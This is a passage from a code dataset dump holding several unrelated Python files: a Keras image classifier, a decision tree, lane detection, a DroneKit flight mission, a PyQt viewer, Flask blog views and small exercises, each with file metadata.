より小さなデータセットを格納するディレクトリへのパス\nbase_dir = '/home/makoto/work/shake/DLwithPython/chapter5/dataset_small'\nif not os.path.exists(base_dir):\n os.mkdir(base_dir)\n\n\n# 訓練データセット、検証データセット、テストデータセットを配置するディレクトリ\ntrain_dir = os.path.join(base_dir, 'train')\nif not os.path.exists(train_dir):\n os.mkdir(train_dir)\n\nvalidation_dir = os.path.join(base_dir, 'validation')\nif not os.path.exists(validation_dir):\n os.mkdir(validation_dir)\n\ntest_dir = os.path.join(base_dir, 'test')\nif not os.path.exists(test_dir):\n os.mkdir(test_dir)\n\n# 訓練用の猫の画像を配置するディレクトリ\ntrain_cats_dir = os.path.join(train_dir, 'cats')\nif not os.path.exists(train_cats_dir):\n os.mkdir(train_cats_dir)\n\n# 訓練用の犬の画像を配置するディレクトリ\ntrain_dogs_dir = os.path.join(train_dir, 'dogs')\nif not os.path.exists(train_dogs_dir):\n os.mkdir(train_dogs_dir)\n\n# 検証用の猫の画像を配置するディレクトリ\nvalidation_cats_dir = os.path.join(validation_dir, 'cats')\nif not os.path.exists(validation_cats_dir):\n os.mkdir(validation_cats_dir)\n\n# 検証用の犬の画像を配置するディレクトリ\nvalidation_dogs_dir = os.path.join(validation_dir, 'dogs')\nif not os.path.exists(validation_dogs_dir):\n os.mkdir(validation_dogs_dir)\n\n# テスト用の猫の画像を配置するディレクトリ\ntest_cats_dir = os.path.join(test_dir, 'cats')\nif not os.path.exists(test_cats_dir):\n os.mkdir(test_cats_dir)\n\n# テスト用の犬の画像を配置するディレクトリ\ntest_dogs_dir = os.path.join(test_dir, 'dogs')\nif not os.path.exists(test_dogs_dir):\n os.mkdir(test_dogs_dir)\n\n# 最初の1,000個の猫画像をtrain_cats_dirにコピー\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の猫画像をvalidation_cats_dirにコピー\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000, 1500)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の猫画像をtest_cats_dirにコピー\nfnames = ['cat.{}.jpg'.format(i) for i in range(1500, 2000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n\n# 最初の1,000個の犬画像をtrain_dogs_dirにコピー\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の犬画像をvalidation_dogs_dirにコピー\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000, 1500)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の犬画像をtest_dogs_dirにコピー\nfnames = ['dog.{}.jpg'.format(i) for i in range(1500, 2000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\nmodel.summary()\n\nmodel.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4), metrics=['acc'])\n\n# すべての画像を1/255でスケーリング\ntrain_datagen = ImageDataGenerator(rescale=1./255)\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_dir, # ターゲットディレクトリ\n target_size=(150, 150), # すべての画像サイズを150x150に変更\n batch_size=20, # バッチサイズ\n class_mode='binary' # binary_crossentropyを使用するため二値のラベルが必要\n )\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_dir,\n target_size=(150, 150),\n batch_size=20,\n class_mode='binary'\n )\n\nhistory = model.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=validation_generator,\n validation_steps=50\n )\n\nmodel.save('cats_and_dogs_small_1.h5')\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\n# 正解率をプロット\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\n# 損失値をプロット\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\n\nplt.show()\n","sub_path":"chapter5/2-2_Dog_vs_Cat_Network.py","file_name":"2-2_Dog_vs_Cat_Network.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"516560543","text":" \ns = \"\"\nnum = 0 # 计算不重复三位数的个数\nfor i in range(1,5): # 百位数迭代 1 到 5 之间的数字,不包括5\n s += str(i) # 百位数\n for j in range(1,5): # 十位数迭代1到5之间的数字,不包括5\n if(i != j): # 百位与十位不相等时\n s += str(j)\n for k in range(1,5):\n if(j != k and len(s) == 2 and k != i): # 十位个位不相等,百位十位都有数字,个位百位不相等时\n s += str(k)\n print(s) # 打印该三位数\n s = str(i) + str(j) # 还原百位十位\n num += 1 # 三位数个数加一\n s = str(i) # 还原百位\n s = \"\" # 字符串置空\nprint(num) # 打印三位数的总个数\n\n\n'''\n总结:\n1.range函数的区间是左闭右开区间\n2.python严格区分缩进符号 统一用tab或者空格 不得混用\n3.str()函数将其他类型转换为字符串类型 len()函数计算字符串长度\n'''\n","sub_path":"Python100/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281543264","text":"from threading import Thread\nfrom subprocess import call\nfrom Classes.MathsQuiz import MathsQuiz\nfrom Classes.Mongo import Mongo\n\n\nclass App(object):\n\n def __init__(self):\n self.userInput = 0\n self.uniqueID = 0\n self.studentName = 0\n self.studentScore = 0\n self.mongo = 0\n self.mongod_startup()\n\n def mongod_startup(self):\n mongod_startup = Thread(target=lambda: call(\"mongodb_startup.bat\"))\n mongod_startup.start()\n\n def option_listing(self):\n print(\"Please choose one of the options below.\\n\\n\"\n \"If you would like to use the Maths Quiz, type '1'\\n\"\n \"If you would like to read existing records, type '2'\\n\"\n \"If you would like to read all existing records, type '3'\\n\"\n \"If you would like to modify existing records, type '4'\\n\"\n \"If you would like to delete existing records, type '5'\\n\"\n \"If you would like to delete the entire database, type '6'\\n\"\n \"If you would like to exit the program, type '7'\\n\"\n )\n self.userInput = str(input(\"Please choose one of the listed options: \"))\n if self.userInput == \"1\":\n self.start_maths_quiz()\n self.option_listing()\n\n elif self.userInput == \"2\":\n self.uniqueID = str(input(\"What is your uniqueID: \"))\n self.define_mongo()\n self.mongo.read_from_database()\n self.option_listing()\n\n elif self.userInput == \"3\":\n self.define_mongo()\n self.mongo.list_all_records()\n self.option_listing()\n\n elif self.userInput == \"4\":\n self.uniqueID = str(input(\"What is your uniqueID: \"))\n self.studentScore = int(input(\"What is your score? \"))\n self.define_mongo()\n self.mongo.overwrite_score_from_database()\n self.option_listing()\n\n elif self.userInput == \"5\":\n self.uniqueID = str(input(\"What is your uniqueID: \"))\n self.define_mongo()\n self.mongo.delete_from_database()\n self.option_listing()\n\n elif self.userInput == \"6\":\n self.define_mongo()\n self.mongo.delete_entire_database()\n self.option_listing()\n\n elif self.userInput == \"7\":\n pass\n\n else:\n print(\"Thats an invalid input, please try again.\")\n self.option_listing()\n\n def define_mongo(self):\n self.mongo = Mongo(self.uniqueID, self.studentName, self.studentScore)\n\n def start_maths_quiz(self):\n print(\n \"In this basic Maths Quiz,\"\n \"You'll answer each question,\"\n \"& at the end you will get a score,\"\n \"which will be stored on a database.\\n\\n\"\n )\n while True:\n quizOrQuit = input(\n \"Do you wish to participate? (Y/N)\"\n ).lower()\n if quizOrQuit not in \"yesno\":\n print(\n \"Not a valid input.\"\n )\n else:\n break\n if quizOrQuit in \"yes\":\n MathsQuiz()\n else:\n pass\n\n\ntest = App()\ntest.option_listing()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131145856","text":"import numpy as np\n\ndef entropy(col):\n _, cnts = np.unique(col, return_counts=True)\n cnts = np.array(cnts)/len(col)\n cnts[cnts!=0] = cnts[cnts!=0]*np.log2(cnts[cnts!=0])\n return -np.sum(cnts)\n\n# For ID3\ndef calcInforGain(col_x, col_y):\n HD = entropy(col_y)\n HDA = 0\n unique = np.unique(col_x)\n for key in unique:\n HDA += entropy(col_y[col_x == key])\n return HD - HDA, unique\n\n# For C4.5\ndef calcInforGainRatio(col_x, col_y):\n HD = entropy(col_y)\n HDA = 0\n unique = np.unique(col_x)\n for key in unique:\n HDA += entropy(col_y[col_x == key])\n return (HD - HDA)/entropy(col_x), unique\n \n# For CART\ndef Gini(col):\n unique, cnts = np.unique(col, return_counts=True)\n cnts = np.array(cnts)/len(col)\n return 1 - np.sum(cnts ** 2)\n \ndef findMinGini(col_x, col_y):\n unique, cnts = np.unique(col_x, return_counts=True)\n cnts = dict(zip(unique, cnts))\n min_gini = 1\n min_key = None\n for key, cnt in cnts.items():\n gini = cnt/len(col_y)*Gini(col_y[col_x == key]) + (1-cnt/len(col_y))*Gini(col_y[col_x != key])\n if gini < min_gini:\n min_gini = gini\n min_key = key\n return min_gini, min_key\n \nclass Node:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.children = []\n \n def __str__(self, indent=0):\n ans = \"\"\n if not self.children:\n ans = str(self.key) + \": \" + str(self.val) + \"\"\n else:\n ans += str(self.key) + \": \" + str(self.val) + \"(\"\n for child in self.children:\n ans += str(child) + \", \"\n ans += \")\"\n return ans\n \n def addChild(self, key, val):\n self.children.append(Node(key, val))\n return self.children[-1]\n \nclass DecisionTree:\n def __init__(self, epsilon=0):\n self.root = Node(\"root\", 0)\n self.epsilon = epsilon\n self.type = None\n \n def fit(self, x, y, type=\"CART\", detailed=False):\n self.type = type\n if type == \"CART\":\n self.CARTgenerate(x, y, self.root, detailed)\n else:\n self.generate(x, y, self.root, type, detailed)\n \n def generate(self, x, y, root, detailed):\n # if empty\n if x.size == 0:\n return\n # if all left are the same kind\n if np.all(y == True) or np.all(y == False):\n root.addChild(\"leaf\", y[0])\n return\n # if all the feature are the same, use the popular one\n if np.all(x == x[0,:]):\n unique, cnts = np.unique(y, return_counts=True)\n cnts = dict(zip(unique, cnts))\n root.addChild(\"leaf\", cnts[True] > cnts[False])\n return \n \n max_gain = 0\n max_feature = -1\n max_feature_vals = None\n \n for i in range(x.shape[-1]):\n if type==\"ID3\":\n gain, feature_vals = calcInforGain(x[:, i], y)\n elif type==\"C4.5\":\n gain, feature_vals = calcInforGainRatio(x[:, i], y)\n if gain > max_gain:\n max_gain = gain\n max_feature = i\n max_feature_vals = feature_vals\n if max_gain < self.epsilon:\n return\n else:\n for val in max_feature_vals:\n child = root.addChild(max_feature, val)\n self.generate(np.delete(x[x[:, max_feature]==val], max_feature, axis=-1), y[x[:, max_feature]==val], child, type, detailed)\n \n def CARTgenerate(self, x, y, root, detailed, min_gini_old=1):\n # if empty\n if x.size == 0:\n return\n # if all left are the same kind\n if np.all(y == True) or np.all(y == False):\n root.addChild(\"leaf\", y[0])\n return\n # if all the feature are the same, use the popular one\n if np.all(x == x[0,:]):\n unique, cnts = np.unique(y, return_counts=True)\n cnts = dict(zip(unique, cnts))\n root.addChild(\"leaf\", cnts[True] > cnts[False])\n return \n \n min_gini = 1\n min_feature = None\n min_feature_val = None\n for i in range(x.shape[-1]):\n gini, feature_val = findMinGini(x[:, i], y)\n if detailed:\n print(gini, feature_val, i)\n if gini < min_gini:\n min_gini = gini\n min_feature = i\n min_feature_val = feature_val\n if abs(min_gini - min_gini_old) < 1e-6: # all feature are random\n unique, cnts = np.unique(y, return_counts=True)\n cnts = dict(zip(unique, cnts))\n root.addChild(\"leaf\", cnts[True] > cnts[False])\n return\n \n child_true = root.addChild((min_feature, min_feature_val,), True)\n self.CARTgenerate(x[x[:, min_feature]==min_feature_val], y[x[:, min_feature]==min_feature_val], child_true, detailed, min_gini)\n child_false = root.addChild((min_feature, min_feature_val,), False)\n self.CARTgenerate(x[x[:, min_feature]!=min_feature_val], y[x[:, min_feature]!=min_feature_val], child_false, detailed, min_gini)\n \n # TODO: find nice regularization function\n def pruning(self, root):\n pass\n \n def predict(self, x):\n assert(len(self.root.children) > 0)\n if len(x.shape) == 1:\n tmp = self.root\n if self.type == 'CART':\n while len(tmp.children) > 1:\n feature = tmp.children[0].key[0]\n if x[feature] == tmp.children[0].key[1]:\n tmp = tmp.children[0]\n else:\n tmp = tmp.children[1]\n if len(tmp.children) == 1 and tmp.children[0].key == 'leaf':\n return tmp.children[0].val\n else:\n while len(tmp.children) > 1:\n feature = tmp.children[0].key\n if x[feature] == tmp.children[0].val:\n tmp = tmp.children[0]\n else:\n tmp = tmp.children[1]\n if len(tmp.children) == 1 and tmp.children[0].key == 'leaf':\n return tmp.children[0].val\n else:\n assert(len(x.shape) == 2)\n ans = []\n for test in x:\n ans.append(self.predict(test))\n return ans","sub_path":"np_ml/random_forest/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"484441095","text":"import glob\n\nimport cv2\nimport numpy as np\nimport peakutils\n\nimport util\nfrom binary_threshold import combined_threshold\nfrom lane import Lane\nfrom line import Left, Right\nfrom perspective_transform import warp\nfrom undistort_image import undistort\n\nMASK_WIDTH = int(1280 / 20)\nMINIMUM_DISTANCE = 0\nTHRESHOLD = 0.0\nWINDOW_COUNT = 9\nX_METERS_PER_PIXEL = 3.67 / 820 # lane width ~ 3.67m, see: https://goo.gl/lzsRjT\nY_METERS_PER_PIXEL = 3.67 / 120 # lane marking lenght ~ 3.67m, see: https://goo.gl/D3OgRP\n\n\ndef annotate(image, lane):\n annotated = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)\n\n lane.left_line.draw_line(annotated)\n lane.right_line.draw_line(annotated)\n\n lane.left_line.draw_points(annotated)\n lane.right_line.draw_points(annotated)\n\n return annotated\n\n\nleft_line = None\nright_line = None\n\n\ndef apply_mask(image, mask_width=MASK_WIDTH):\n if left_line is None or right_line is None:\n return image\n\n mask = cv2.bitwise_or(left_line.get_mask(mask_width), right_line.get_mask(mask_width))\n return cv2.bitwise_and(image, (255), mask=mask)\n\n\ndef find_lane(image: np.ndarray, minimum_distance=MINIMUM_DISTANCE, smooth=False, threshold=THRESHOLD, use_mask=False):\n global left_line\n global right_line\n\n image_height, image_width = image.shape\n window_height = int(image_height / WINDOW_COUNT)\n image_center = int(image_width / 2)\n\n if use_mask:\n image = apply_mask(image)\n else:\n left_line = None\n right_line = None\n\n left_points, right_points = [], []\n\n for y1 in np.arange(image_height, 0, -window_height):\n y0 = y1 - window_height\n window = image[y0:y1, :]\n\n # find peaks using PeakUtils (http://pythonhosted.org/PeakUtils/)\n sum = np.sum(window, axis=0, dtype=np.float)\n if sum.max() > 0.0:\n sum -= peakutils.baseline(sum, deg=8)\n peak = peakutils.indexes(sum, thres=threshold, min_dist=minimum_distance)\n\n # sort left/right\n y = int((y0 + y1) / 2)\n for x in peak:\n if x <= image_center:\n left_points.append((y, x))\n else:\n right_points.append((y, x))\n\n left_line = Left(left_points, image_height, image_width, Y_METERS_PER_PIXEL, X_METERS_PER_PIXEL, smooth)\n right_line = Right(right_points, image_height, image_width, Y_METERS_PER_PIXEL, X_METERS_PER_PIXEL, smooth)\n\n lane = Lane(left_line, right_line, image)\n\n return lane\n\n\nif __name__ == '__main__':\n test_images = glob.glob('../test_images/*.jpg')\n output_images = []\n\n for test_image in test_images:\n image = cv2.imread(test_image)\n\n undistorted = undistort(image)\n warped = warp(undistorted, borderMode=cv2.BORDER_REFLECT)\n binary = combined_threshold(warped)\n\n lane = find_lane(binary, minimum_distance=640, threshold=0.1, use_mask=False)\n annotated = annotate(binary, lane=lane)\n\n output_images.append(warped)\n output_images.append(annotated)\n\n collage = util.collage(output_images, len(test_images), 2)\n cv2.imwrite('../output_images/lane_finder.png', collage)\n","sub_path":"scripts/lane_finder.py","file_name":"lane_finder.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"169928148","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 3 17:36:19 2019\n\n@author: Usuario\n\"\"\"\nfrom pathlib import Path\ndatafolder=Path(\"C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoRE/txt\")\nimport sys\nsys.path.insert(1,'C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/funciones')\nfrom yolovoc import yolo2voc\nfrom readboxes import read_boxes\nfrom rOI import ROI\nfrom ventaneo import ventaneoo\n\n\nimport cv2\nimport numpy as np\nimport glob\n\nfrom matplotlib import pyplot as plt\n\n\n \nfor image in glob.glob('*.jpg'):\n # image = '00002.jpg'\n im = cv2.imread(image)\n aa,bb,c = im.shape \n imaROI=ROI(im)\n imaROI=cv2.normalize(imaROI, None, 0, 1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\n \n #cv2.imshow('Grays',imaROI)\n #cv2.destroyAllWindows()\n for z in range(c):\n im[:,:,z]=im[:,:,z]*imaROI\n \n _,contours,_= cv2.findContours(imaROI,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt=contours[max_index]\n x,y,w,h = cv2.boundingRect(cnt)\n a,b,ch = im[y:y+h,x:x+w].shape\n im=im[y:y+h,x:x+w]\n# tamañoA=50\n# tamañoB=50\n# re=0\n# for f in range(0,a-tamañoA,tamañoA):\n# for c in range(0,b-tamañoB,tamañoB):\n# cropped=ventaneoo(tamañoA, tamañoB,a,b,f,c, im)\n# dire='C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoDM/50x50/NO/1/'+image[0:len(image)-3]+'-'+str(re)+'.jpg'\n# cv2.imwrite(dire,cropped)\n# re=re+1\n# tamañoaA=150\n# tamañoaB=150\n# rea=0\n# for fa in range(0,a-tamañoaA,tamañoaA):\n# for ca in range(0,b-tamañoaB,tamañoaB):\n# croppeda=ventaneoo(tamañoaA, tamañoaB,a,b,fa,ca, im)\n# dire='C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoDM/150x150/NO/1/'+image[0:len(image)-3]+'-'+str(rea)+'.jpg'\n# cv2.imwrite(dire,croppeda)\n# rea=rea+1\n tamañoa1A=300\n tamañoa1B=300\n rea1=0\n for fa1 in range(0,a-tamañoa1A,tamañoa1A):\n for ca1 in range(0,b-tamañoa1B,tamañoa1B):\n croppeda1=ventaneoo(tamañoa1A, tamañoa1B,a,b,fa1,ca1, im)\n dire='C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoDM/500x500/NO/8/'+image[0:len(image)-3]+'-'+str(rea1)+'.jpg'\n cv2.imwrite(dire,croppeda1)\n rea1=rea1+1\n print(image)","sub_path":"balanceoDM/NO/8/cutNoRE.py","file_name":"cutNoRE.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259649427","text":"from dronekit import connect, VehicleMode, LocationGlobalRelative\r\nimport time\r\n\r\n#connecting to vehicle\r\nimport argparse\r\nparser = argparse.ArgumentParser(description='commands')\r\nparser.add_argument('--connect')\r\nargs = parser.parse_args()\r\n\r\nconnection_string = args.connect\r\n\r\nprint('Connection to the Vehicle on %s'%connection_string)\r\nvehicle = connect(connection_string,wait_ready = True,heartbeat_timeout=180)\r\n\r\n#functions\r\ndef arm_and_takeoff(tgt_altitude):\r\n\tprint('Arming')\r\n\r\n\twhile not vehicle.is_armable:\r\n\t\tprint('Arm failed')\r\n\t\ttime.sleep(1)\r\n\r\n\tvehicle.mode = VehicleMode('GUIDED')\r\n\tvehicle.armed = True\r\n\r\n\tvehicle.simple_takeoff(tgt_altitude)\r\n\tprint('TAKEOFF')\r\n\r\n\t#wait for reaching the target altitude\r\n\twhile True:\r\n\t\taltitude = vehicle.location.global_relative_frame.alt\r\n\r\n\t\tif altitude >= tgt_altitude -1:\r\n\t\t\tprint('Target Altitude Reached')\r\n\t\t\tbreak\r\n\ttime.sleep(1)\r\n\r\n\r\n#MAIN MISSION\r\narm_and_takeoff(15)\r\n\r\n#SPEED\r\nvehicle.airspeed = 10\r\n\r\n#WAYPOINT #1\r\nprint('going to waypoint #1')\r\nwp1 = LocationGlobalRelative(38.733478, -121.211845, 15)\r\nvehicle.simple_goto(wp1)\r\n\r\n#TRAVEL\r\ntime.sleep(30)\r\n\r\n#RETURN\r\nprint('RTL')\r\nvehicle.mode = VehicleMode('RTL')\r\n\r\n#TRAVEL\r\ntime.sleep(25)\r\n\r\n#CLOSE CONNECTION\r\nvehicle.close()\r\n","sub_path":"mission1.py","file_name":"mission1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651823611","text":"#!/usr/bin/python2.7\n#\n# Copyright 2010 Google Inc. All Rights Reserved.\n\n\"\"\"Unittest for text_query.py module.\"\"\"\n\n__author__ = 'eyalf@google.com (Eyal Fink)'\n\nfrom google.appengine.ext import db\nimport text_query\nimport unittest\n\n\nclass TextQueryTests(unittest.TestCase):\n def test_normalize(self):\n assert text_query.normalize(u'hi there') == u'HI THERE'\n assert text_query.normalize(u'salut l\\xe0') == u'SALUT LA'\n assert text_query.normalize(\n u'L\\xf2ng Str\\xefng w\\xedth l\\xf4ts \\xf6f \\xc3cc\\xebnts') == \\\n u'LONG STRING WITH LOTS OF ACCENTS'\n\n def test_cjk_separation(self):\n q = text_query.TextQuery(u'\\u4f59\\u5609\\u5e73')\n assert [u'\\u4f59', u'\\u5609', u'\\u5e73'] == q.words\n assert q.words == q.query_words\n q = text_query.TextQuery(u'foo\\u4f59\\u5609bar\\u5e73')\n assert q.words == ['FOO', u'\\u4f59', u'\\u5609', 'BAR', u'\\u5e73']\n assert q.words == q.query_words\n \n def test_parsing(self):\n q = text_query.TextQuery('abcd e fghij')\n assert ['ABCD', 'E', 'FGHIJ'] == q.words\n assert q.words == q.query_words\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_text_query.py","file_name":"test_text_query.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610995985","text":"\n\nfrom xai.brain.wordbase.nouns._benefit import _BENEFIT\n\n#calss header\nclass _BENEFITTING(_BENEFIT, ):\n\tdef __init__(self,): \n\t\t_BENEFIT.__init__(self)\n\t\tself.name = \"BENEFITTING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"benefit\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_benefitting.py","file_name":"_benefitting.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"625949243","text":"from PyQt5.QtWidgets import QApplication, QWidget,QPushButton, QLineEdit,QLabel\r\nfrom PyQt5.QtGui import QPixmap\r\nimport sys\r\n\r\nclass Example(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setGeometry(100, 100, 1000, 900)\r\n self.setWindowTitle('15_2')\r\n\r\n self.btn = QPushButton('Вывести картинку', self)\r\n self.btn.move(20, 20)\r\n self.btn.clicked.connect(self.run)\r\n\r\n self.file_name = QLineEdit(self)\r\n self.file_name.move(150, 20)\r\n\r\n self.pixmap = QPixmap()\r\n self.image = QLabel(self)\r\n self.image.move(80,60)\r\n self.image.resize(950,750)\r\n self.image.setPixmap(self.pixmap)\r\n\r\n\r\n\r\n def run(self):\r\n self.pixmap.load(self.file_name.text())\r\n self.image.setPixmap(self.pixmap)\r\n\r\n self.image.resize(self.pixmap.width(),self.pixmap.height())\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n ex.show()\r\n sys.exit(app.exec())","sub_path":"15_2.py","file_name":"15_2.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"376937498","text":"from flask import render_template\r\nfrom sqlalchemy import func\r\n\r\nfrom main import app\r\nfrom models import db, User, Post, Tag, Comment, posts_tags\r\nfrom flask_wtf import Form\r\nfrom wtforms import StringField, TextField\r\nfrom wtforms.validators import DataRequired, Length\r\n\r\ndef sidebar_data():\r\n \"\"\"Set the sidebar function.\"\"\"\r\n\r\n # Get post of recent\r\n recent = db.session.query(Post).order_by(\r\n Post.publish_date.desc()\r\n ).limit(5).all()\r\n\r\n # Get the tags and sort by count of posts.\r\n top_tags = db.session.query(\r\n Tag, func.count(posts_tags.c.post_id).label('total')\r\n ).join(\r\n posts_tags\r\n ).group_by(Tag).order_by('total DESC').limit(5).all()\r\n return recent, top_tags\r\n\r\n\r\n\r\n@app.route('/')\r\n@app.route('/')\r\ndef home(page=1):\r\n \"\"\"View function for home page\"\"\"\r\n\r\n posts = Post.query.order_by(\r\n Post.publish_date.desc()\r\n ).paginate(page, 10)\r\n\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('home.html',\r\n posts=posts,\r\n recent=recent,\r\n top_tags=top_tags)\r\n\r\nclass CommentForm(Form):\r\n \"\"\"Form vaildator for comment.\"\"\"\r\n\r\n # Set some field(InputBox) for enter the data.\r\n # patam validators: setup list of validators\r\n name = StringField(\r\n 'Name',\r\n validators=[DataRequired(), Length(max=255)])\r\n\r\n text = TextField(u'Comment', validators=[DataRequired()])\r\n# WTF 的基础使用\r\n# WTForms 由 字段、检验器、表单 三部分组成: \r\n# 字段:表示表单的输入框,会做一些初步的输入检查 \r\n# 检验器:是一组被附加到字段(输入框)上的函数,用于对输入数据的检验,确保输入我们期望的数据 \r\n# 表单:是一个 Python 类,其中包含了 字段(类属性) 和 检验器,在接收到 HTTP POST 请求时,会根据定义的检验器规则来对输入数据进行检验\r\n\r\n# NOTE 1:表单类需要继承 Flask WTF 扩展提供的 Form 类 \r\n# NOTE 2:表单类中的一个类属性,就代表了一个字段,即输入框。wtforms 提供了多种类型的字段类 \r\n# NOTE 3:字段类的第一个参数为输入框标题,第二个参数为绑定到该字段的检验器列表,由 wtforms.validators 提供\r\n\r\n\r\n@app.route('/post/', methods=('GET', 'POST'))\r\ndef post(post_id):\r\n \"\"\"View function for post page\"\"\"\r\n # form.validata_on_submit() 方法会隐式的判断该 HTTP 请求是不是 POST, 若是, 则将请求中提交的表单数据对象传入上述的 form 对象并进行数据检验.\r\n\r\n # 若提交的表单数据对象通过了 form 对象的检验, 则 form.validata_on_submit() 返回为 True 并且将这些数据传给 form 对象, 成为其实例属性.\r\n # Form object: `Comment`\r\n form = CommentForm()\r\n # form.validate_on_submit() will be true and return the\r\n # data object to form instance from user enter,\r\n # when the HTTP request is POST\r\n if form.validate_on_submit():\r\n new_comment = Comment(id=str(uuid4()),\r\n name=form.name.data)\r\n new_comment.text = form.text.data\r\n new_comment.date = datetime.datetime.now()\r\n new_comment.post_id = post_id\r\n db.session.add(new_comment)\r\n db.session.commit()\r\n\r\n post = Post.query.get_or_404(post_id)\r\n tags = post.tags\r\n comments = post.comments.order_by(Comment.date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('post.html',\r\n post=post,\r\n tags=tags,\r\n comments=comments,\r\n form=form,\r\n recent=recent,\r\n top_tags=top_tags)\r\n\r\n\r\n\r\n@app.route('/post/')\r\ndef post(post_id):\r\n \"\"\"View function for post page\"\"\"\r\n\r\n post = db.session.query(Post).get_or_404(post_id)\r\n tags = post.tags\r\n comments = post.comment.order_by(Comment.date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('post.html',\r\n post=post,\r\n tags=tags,\r\n comments=comments,\r\n recent=recent,\r\n top_tags=top_tags)\r\n\r\n\r\n@app.route('/tag/')\r\ndef tag(tag_name):\r\n \"\"\"View function for tag page\"\"\"\r\n\r\n tag = db.session.query(Tag).filter_by(name=tag_name).first_or_404()\r\n posts = tag.posts.order_by(Post.publish_date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('tag.html',\r\n tag=tag,\r\n posts=posts,\r\n recent=recent,\r\n 